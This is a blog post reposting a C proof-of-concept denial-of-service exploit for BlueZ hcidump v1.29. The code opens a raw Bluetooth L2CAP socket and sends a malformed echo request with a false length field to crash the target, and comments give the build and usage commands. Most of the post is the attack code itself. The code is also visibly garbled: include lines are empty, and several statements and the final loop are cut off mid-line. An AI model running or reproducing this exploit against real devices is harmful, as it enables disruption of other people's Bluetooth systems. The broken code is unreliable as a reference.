hcidump-crash.c

POC exploit by Pierre Betouin that crashes hcidump by sending bad L2CAP packet.

/* Bluez hcidump v1.29 DoS – PoC code */
/* Pierre BETOUIN – pierre.betouin@infratech.fr */
/* 01/18/06 */
/* Vulnerability found using BSS fuzzer : */
/* Download http://www.secuobs.com/news/05022006-bluetooth10.shtml */
/* Crashes hcidump sending bad L2CAP packet */
/* */
/* gcc -lbluetooth hcidump-crash.c -o hcidump-crash */
/* ./hcidump-crash 00:80:37:XX:XX:XX */
/* L2CAP packet sent (15) */
/* Buffer: 08 01 0C 00 41 41 41 41 41 41 41 41 41 41 41 */

#include
#include
#include
#include
#include
#include
#include
#include

#define SIZE 15
#define FAKE_SIZE 12

int main(int argc, char **argv)
{
char *buffer;
l2cap_cmd_hdr *cmd;
struct sockaddr_l2 addr;
int sock, sent, i;

if(argc \n”, argv[0]);
exit(EXIT_FAILURE);
}

if ((sock = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP)) code = L2CAP_ECHO_REQ;
cmd->ident = 1;
cmd->len = FAKE_SIZE;

if( (sent=send(sock, buffer, SIZE, 0)) >= 0)
{
printf(“L2CAP packet sent (%d)\n”, sent);
}

printf(“Buffer:\t”);
for(i=0; i

Advertisements

~ by Balle on July 6, 2007.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

 
%d bloggers like this: